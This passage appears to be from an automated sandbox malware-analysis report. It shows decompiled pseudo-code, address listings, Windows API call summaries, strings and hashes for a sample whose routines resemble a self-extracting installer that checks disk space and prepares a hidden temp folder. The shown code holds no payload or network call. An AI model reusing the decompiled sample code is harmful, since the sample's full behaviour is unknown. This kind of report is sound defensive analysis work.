                                                                                                                                                                                                      																					_t67 = E003E597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                      																					__eflags = _t67;
                                                                                                                                                                                                      																					if(_t67 == 0) {
                                                                                                                                                                                                      																						goto L28;
                                                                                                                                                                                                      																					} else {
                                                                                                                                                                                                      																						goto L33;
                                                                                                                                                                                                      																					}
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																			}
                                                                                                                                                                                                      																		} else {
                                                                                                                                                                                                      																			goto L28;
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														goto L22;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L47;
                                                                                                                                                                                                      												L42:
                                                                                                                                                                                                      												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                      											} while (_t60 <= 0x5a);
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										goto L43;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t101 = 1;
                                                                                                                                                                                                      										_t69 = E003E5467(0x3e91e4, 1, 3); // executed
                                                                                                                                                                                                      										__eflags = _t69;
                                                                                                                                                                                                      										if(_t69 != 0) {
                                                                                                                                                                                                      											goto L45;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t82 = 0x3e91e4;
                                                                                                                                                                                                      											_t70 = E003E2630(0, 0x3e91e4, 1);
                                                                                                                                                                                                      											__eflags = _t70;
                                                                                                                                                                                                      											if(_t70 != 0) {
                                                                                                                                                                                                      												goto L19;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t101 = 1;
                                                                                                                                                                                                      												_t82 = 0x3e91e4;
                                                                                                                                                                                                      												_t71 = E003E5467(0x3e91e4, 1, 1);
                                                                                                                                                                                                      												__eflags = _t71;
                                                                                                                                                                                                      												if(_t71 != 0) {
                                                                                                                                                                                                      													goto L45;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													do {
                                                                                                                                                                                                      														goto L19;
                                                                                                                                                                                                      														L43:
                                                                                                                                                                                                      														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                      														_push(4);
                                                                                                                                                                                                      														_t101 = 3;
                                                                                                                                                                                                      														_t82 =  &_v268;
                                                                                                                                                                                                      														_t44 = E003E597D(_t82, _t101, 1);
                                                                                                                                                                                                      														__eflags = _t44;
                                                                                                                                                                                                      													} while (_t44 != 0);
                                                                                                                                                                                                      													goto L2;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                      							if(_t35 != 0x5c) {
                                                                                                                                                                                                      								L10:
                                                                                                                                                                                                      								_t72 = 1;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								__eflags =  *0x3e8b3f - _t35; // 0x0
                                                                                                                                                                                                      								_t72 = 0;
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									goto L10;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t101 = 0;
                                                                                                                                                                                                      							_t73 = E003E5467(0x3e8b3e, 0, _t72);
                                                                                                                                                                                                      							__eflags = _t73;
                                                                                                                                                                                                      							if(_t73 != 0) {
                                                                                                                                                                                                      								L45:
                                                                                                                                                                                                      								_t38 = 1;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t101 = 0x4be;
                                                                                                                                                                                                      								E003E44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                      								goto L2;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t101 = 0x4b1;
                                                                                                                                                                                                      						E003E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						LocalFree(_t109);
                                                                                                                                                                                                      						 *0x3e9124 = 0x80070714;
                                                                                                                                                                                                      						goto L2;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t101 = 0x4b5;
                                                                                                                                                                                                      					E003E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                      					_t38 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L47:
                                                                                                                                                                                                      				return E003E6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                      			}

                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e572b
                                                                                                                                                                                                      0x003e572b
                                                                                                                                                                                                      0x003e572e
                                                                                                                                                                                                      0x003e5742
                                                                                                                                                                                                      0x003e5742
                                                                                                                                                                                                      0x003e5745
                                                                                                                                                                                                      0x003e576b
                                                                                                                                                                                                      0x003e576b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5747
                                                                                                                                                                                                      0x003e5747
                                                                                                                                                                                                      0x003e574d
                                                                                                                                                                                                      0x003e574f
                                                                                                                                                                                                      0x003e5771
                                                                                                                                                                                                      0x003e5771
                                                                                                                                                                                                      0x003e5773
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5751
                                                                                                                                                                                                      0x003e5751
                                                                                                                                                                                                      0x003e5753
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5755
                                                                                                                                                                                                      0x003e575b
                                                                                                                                                                                                      0x003e5760
                                                                                                                                                                                                      0x003e5762
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5764
                                                                                                                                                                                                      0x003e5764
                                                                                                                                                                                                      0x003e5769
                                                                                                                                                                                                      0x003e577e
                                                                                                                                                                                                      0x003e577e
                                                                                                                                                                                                      0x003e5781
                                                                                                                                                                                                      0x003e5788
                                                                                                                                                                                                      0x003e578d
                                                                                                                                                                                                      0x003e578f
                                                                                                                                                                                                      0x003e57b2
                                                                                                                                                                                                      0x003e57b8
                                                                                                                                                                                                      0x003e57bd
                                                                                                                                                                                                      0x003e57bf
                                                                                                                                                                                                      0x003e57cd
                                                                                                                                                                                                      0x003e57cd
                                                                                                                                                                                                      0x003e57dd
                                                                                                                                                                                                      0x003e57e3
                                                                                                                                                                                                      0x003e57ef
                                                                                                                                                                                                      0x003e57f5
                                                                                                                                                                                                      0x003e57f8
                                                                                                                                                                                                      0x003e580a
                                                                                                                                                                                                      0x003e580a
                                                                                                                                                                                                      0x003e57fa
                                                                                                                                                                                                      0x003e5802
                                                                                                                                                                                                      0x003e5802
                                                                                                                                                                                                      0x003e580d
                                                                                                                                                                                                      0x003e580f
                                                                                                                                                                                                      0x003e5830
                                                                                                                                                                                                      0x003e5836
                                                                                                                                                                                                      0x003e583d
                                                                                                                                                                                                      0x003e584b
                                                                                                                                                                                                      0x003e5851
                                                                                                                                                                                                      0x003e5855
                                                                                                                                                                                                      0x003e585a
                                                                                                                                                                                                      0x003e585c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e585e
                                                                                                                                                                                                      0x003e585e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e585e
                                                                                                                                                                                                      0x003e5811
                                                                                                                                                                                                      0x003e5817
                                                                                                                                                                                                      0x003e5819
                                                                                                                                                                                                      0x003e581f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e581f
                                                                                                                                                                                                      0x003e5791
                                                                                                                                                                                                      0x003e5797
                                                                                                                                                                                                      0x003e579c
                                                                                                                                                                                                      0x003e579e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e57a0
                                                                                                                                                                                                      0x003e57a9
                                                                                                                                                                                                      0x003e57ae
                                                                                                                                                                                                      0x003e57b0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e57b0
                                                                                                                                                                                                      0x003e579e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5769
                                                                                                                                                                                                      0x003e5762
                                                                                                                                                                                                      0x003e5753
                                                                                                                                                                                                      0x003e574f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e572e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5864
                                                                                                                                                                                                      0x003e5864
                                                                                                                                                                                                      0x003e5864
                                                                                                                                                                                                      0x003e5717
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e56c3
                                                                                                                                                                                                      0x003e56c5
                                                                                                                                                                                                      0x003e56c9
                                                                                                                                                                                                      0x003e56ce
                                                                                                                                                                                                      0x003e56d0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e56d6
                                                                                                                                                                                                      0x003e56d6
                                                                                                                                                                                                      0x003e56d8
                                                                                                                                                                                                      0x003e56dd
                                                                                                                                                                                                      0x003e56df
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e56e1
                                                                                                                                                                                                      0x003e56e2
                                                                                                                                                                                                      0x003e56e4
                                                                                                                                                                                                      0x003e56e6
                                                                                                                                                                                                      0x003e56eb
                                                                                                                                                                                                      0x003e56ed
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e56f3
                                                                                                                                                                                                      0x003e56f3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e586c
                                                                                                                                                                                                      0x003e5878
                                                                                                                                                                                                      0x003e587e
                                                                                                                                                                                                      0x003e5882
                                                                                                                                                                                                      0x003e5883
                                                                                                                                                                                                      0x003e5889

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46A0
                                                                                                                                                                                                        • Part of subcall function 003E468F: SizeofResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46A9
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46C3
                                                                                                                                                                                                        • Part of subcall function 003E468F: LoadResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46CC
                                                                                                                                                                                                        • Part of subcall function 003E468F: LockResource.KERNEL32(00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46D3
                                                                                                                                                                                                        • Part of subcall function 003E468F: memcpy_s.MSVCRT ref: 003E46E5
                                                                                                                                                                                                        • Part of subcall function 003E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 003E55CF
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 003E5638
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 003E564C
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 003E5620
                                                                                                                                                                                                        • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                        • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 003E4554
                                                                                                                                                                                                        • Part of subcall function 003E6285: GetLastError.KERNEL32(003E5BBC), ref: 003E6285
                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 003E56B9
                                                                                                                                                                                                      • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 003E571E
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 003E5737
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 003E57CD
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 003E57EF
                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 003E5802
                                                                                                                                                                                                        • Part of subcall function 003E2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 003E2654
                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 003E5830
                                                                                                                                                                                                        • Part of subcall function 003E6517: FindResourceA.KERNEL32(003E0000,000007D6,00000005), ref: 003E652A
                                                                                                                                                                                                        • Part of subcall function 003E6517: LoadResource.KERNEL32(003E0000,00000000,?,?,003E2EE8,00000000,003E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 003E6538
                                                                                                                                                                                                        • Part of subcall function 003E6517: DialogBoxIndirectParamA.USER32(003E0000,00000000,00000547,003E19E0,00000000), ref: 003E6557
                                                                                                                                                                                                        • Part of subcall function 003E6517: FreeResource.KERNEL32(00000000,?,?,003E2EE8,00000000,003E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 003E6560
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 003E5878
                                                                                                                                                                                                        • Part of subcall function 003E597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 003E59A8
                                                                                                                                                                                                        • Part of subcall function 003E597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 003E59AF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                      • API String ID: 2436801531-3498133043
                                                                                                                                                                                                      • Opcode ID: 31ba10ddf8f543cec88bed9e4a5ccca4f1e4029171f102482213c1bcc37bf32e
                                                                                                                                                                                                      • Instruction ID: 0c020db2d88280737701a8471d4d5b1b2b62958cdb55b86c6960862645f0710a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31ba10ddf8f543cec88bed9e4a5ccca4f1e4029171f102482213c1bcc37bf32e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2812C70B04AF89ADB33AB338C85BEE765D9B65348F010365F586DA1D1DFB09EC18A50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      control_flow_graph 324 3e597d-3e59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 3e59dd-3e5a1b GetDiskFreeSpaceA 324->325 326 3e59bb-3e59d8 call 3e44b9 call 3e6285 324->326 327 3e5ba1-3e5bde memset call 3e6285 GetLastError FormatMessageA 325->327 328 3e5a21-3e5a4a MulDiv 325->328 341 3e5c05-3e5c14 call 3e6ce0 326->341 338 3e5be3-3e5bfc call 3e44b9 SetCurrentDirectoryA 327->338 328->327 331 3e5a50-3e5a6c GetVolumeInformationA 328->331 334 3e5a6e-3e5ab0 memset call 3e6285 GetLastError FormatMessageA 331->334 335 3e5ab5-3e5aca SetCurrentDirectoryA 331->335 334->338 340 3e5acc-3e5ad1 335->340 351 3e5c02 338->351 344 3e5ae2-3e5ae4 340->344 345 3e5ad3-3e5ad8 340->345 349 3e5ae6 344->349 350 3e5ae7-3e5af8 344->350 345->344 347 3e5ada-3e5ae0 345->347 347->340 347->344 349->350 353 3e5af9-3e5afb 350->353 354 3e5c04 351->354 355 3e5afd-3e5b03 353->355 356 3e5b05-3e5b08 353->356 354->341 355->353 355->356 357 3e5b0a-3e5b1b call 3e44b9 356->357 358 3e5b20-3e5b27 356->358 357->351 360 3e5b29-3e5b33 358->360 361 3e5b52-3e5b5b 358->361 360->361 363 3e5b35-3e5b50 360->363 364 3e5b62-3e5b6d 361->364 363->364 365 3e5b6f-3e5b74 364->365 366 3e5b76-3e5b7d 364->366 367 3e5b85 365->367 368 3e5b7f-3e5b81 366->368 369 3e5b83 366->369 370 3e5b96-3e5b9f 367->370 371 3e5b87-3e5b94 call 3e268b 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                                                                      			E003E597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v16;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				char _v788;
                                                                                                                                                                                                      				long _v792;
                                                                                                                                                                                                      				long _v796;
                                                                                                                                                                                                      				long _v800;
                                                                                                                                                                                                      				signed int _v804;
                                                                                                                                                                                                      				long _v808;
                                                                                                                                                                                                      				int _v812;
                                                                                                                                                                                                      				long _v816;
                                                                                                                                                                                                      				long _v820;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                      				signed int _t55;
                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                      				int _t69;
                                                                                                                                                                                                      				signed int _t73;
                                                                                                                                                                                                      				signed short _t78;
                                                                                                                                                                                                      				signed int _t87;
                                                                                                                                                                                                      				signed int _t101;
                                                                                                                                                                                                      				int _t102;
                                                                                                                                                                                                      				unsigned int _t103;
                                                                                                                                                                                                      				unsigned int _t105;
                                                                                                                                                                                                      				signed int _t111;
                                                                                                                                                                                                      				long _t112;
                                                                                                                                                                                                      				signed int _t116;
                                                                                                                                                                                                      				CHAR* _t118;
                                                                                                                                                                                                      				signed int _t119;
                                                                                                                                                                                                      				signed int _t120;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t114 = __edi;
                                                                                                                                                                                                      				_t46 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                      				_v804 = __edx;
                                                                                                                                                                                                      				_t118 = __ecx;
                                                                                                                                                                                                      				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                      				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                      				if(_t50 != 0) {
                                                                                                                                                                                                      					_push(__edi);
                                                                                                                                                                                                      					_v796 = 0;
                                                                                                                                                                                                      					_v792 = 0;
                                                                                                                                                                                                      					_v800 = 0;
                                                                                                                                                                                                      					_v808 = 0;
                                                                                                                                                                                                      					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                      					__eflags = _t55;
                                                                                                                                                                                                      					if(_t55 == 0) {
                                                                                                                                                                                                      						L29:
                                                                                                                                                                                                      						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                      						 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                      						_t110 = 0x4b0;
                                                                                                                                                                                                      						L30:
                                                                                                                                                                                                      						__eflags = 0;
                                                                                                                                                                                                      						E003E44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                      						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                      						L31:
                                                                                                                                                                                                      						_t66 = 0;
                                                                                                                                                                                                      						__eflags = 0;
                                                                                                                                                                                                      						L32:
                                                                                                                                                                                                      						_pop(_t114);
                                                                                                                                                                                                      						goto L33;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t69 = _v792 * _v796;
                                                                                                                                                                                                      					_v812 = _t69;
                                                                                                                                                                                                      					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                      					__eflags = _t116;
                                                                                                                                                                                                      					if(_t116 == 0) {
                                                                                                                                                                                                      						goto L29;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                      					__eflags = _t73;
                                                                                                                                                                                                      					if(_t73 != 0) {
                                                                                                                                                                                                      						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                      						_t101 =  &_v16;
                                                                                                                                                                                                      						_t111 = 6;
                                                                                                                                                                                                      						_t119 = _t118 - _t101;
                                                                                                                                                                                                      						__eflags = _t119;
                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                      							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                      							__eflags = _t22;
                                                                                                                                                                                                      							if(_t22 == 0) {
                                                                                                                                                                                                      								break;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                      							__eflags = _t87;
                                                                                                                                                                                                      							if(_t87 == 0) {
                                                                                                                                                                                                      								break;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							 *_t101 = _t87;
                                                                                                                                                                                                      							_t101 = _t101 + 1;
                                                                                                                                                                                                      							_t111 = _t111 - 1;
                                                                                                                                                                                                      							__eflags = _t111;
                                                                                                                                                                                                      							if(_t111 != 0) {
                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t111;
                                                                                                                                                                                                      						if(_t111 == 0) {
                                                                                                                                                                                                      							_t101 = _t101 - 1;
                                                                                                                                                                                                      							__eflags = _t101;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *_t101 = 0;
                                                                                                                                                                                                      						_t112 = 0x200;
                                                                                                                                                                                                      						_t102 = _v812;
                                                                                                                                                                                                      						_t78 = 0;
                                                                                                                                                                                                      						_t118 = 8;
                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                      							__eflags = _t102 - _t112;
                                                                                                                                                                                                      							if(_t102 == _t112) {
                                                                                                                                                                                                      								break;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t112 = _t112 + _t112;
                                                                                                                                                                                                      							_t78 = _t78 + 1;
                                                                                                                                                                                                      							__eflags = _t78 - _t118;
                                                                                                                                                                                                      							if(_t78 < _t118) {
                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t78 - _t118;
                                                                                                                                                                                                      						if(_t78 != _t118) {
                                                                                                                                                                                                      							__eflags =  *0x3e9a34 & 0x00000008;
                                                                                                                                                                                                      							if(( *0x3e9a34 & 0x00000008) == 0) {
                                                                                                                                                                                                      								L20:
                                                                                                                                                                                                      								_t103 =  *0x3e9a38; // 0x0
                                                                                                                                                                                                      								_t110 =  *((intOrPtr*)(0x3e89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                      								L21:
                                                                                                                                                                                                      								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                      								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                      									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                      									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                      										__eflags = _t103 - _t116;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										__eflags = _t110 - _t116;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								if(__eflags <= 0) {
                                                                                                                                                                                                      									 *0x3e9124 = 0;
                                                                                                                                                                                                      									_t66 = 1;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t66 = E003E268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                      							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t105 =  *0x3e9a38; // 0x0
                                                                                                                                                                                                      							_t110 =  *((intOrPtr*)(0x3e89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x3e89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                      							_t103 = (_t105 >> 2) +  *0x3e9a38;
                                                                                                                                                                                                      							goto L21;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t110 = 0x4c5;
                                                                                                                                                                                                      						E003E44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						goto L31;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                      					 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                      					_t110 = 0x4f9;
                                                                                                                                                                                                      					goto L30;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t110 = 0x4bc;
                                                                                                                                                                                                      					E003E44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      					_t66 = 0;
                                                                                                                                                                                                      					L33:
                                                                                                                                                                                                      					return E003E6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}




































                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 003E59A8
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(?), ref: 003E59AF
                                                                                                                                                                                                      • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 003E5A13
                                                                                                                                                                                                      • MulDiv.KERNEL32(?,?,00000400), ref: 003E5A40
                                                                                                                                                                                                      • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 003E5A64
                                                                                                                                                                                                      • memset.MSVCRT ref: 003E5A7C
                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 003E5A98
                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 003E5AA5
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 003E5BFC
                                                                                                                                                                                                        • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                        • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 003E4554
                                                                                                                                                                                                        • Part of subcall function 003E6285: GetLastError.KERNEL32(003E5BBC), ref: 003E6285
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4237285672-0
                                                                                                                                                                                                      • Opcode ID: 6228c6c3c04576f7fe0a5c896d0ebfcb5ca5917c6344a087f14117b8cdccfc49
                                                                                                                                                                                                      • Instruction ID: 59d3013c3e3d58d412669bc0f212e54c9aae8590eca204709f0d0376b6df108c
